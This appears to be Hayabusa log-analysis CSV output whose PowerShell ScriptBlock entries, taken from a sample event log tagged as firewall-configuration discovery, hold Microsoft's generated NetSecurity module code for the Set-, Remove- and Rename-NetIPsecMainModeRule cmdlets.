$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = 
${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdle",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in 
$InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('D",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"isplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, 
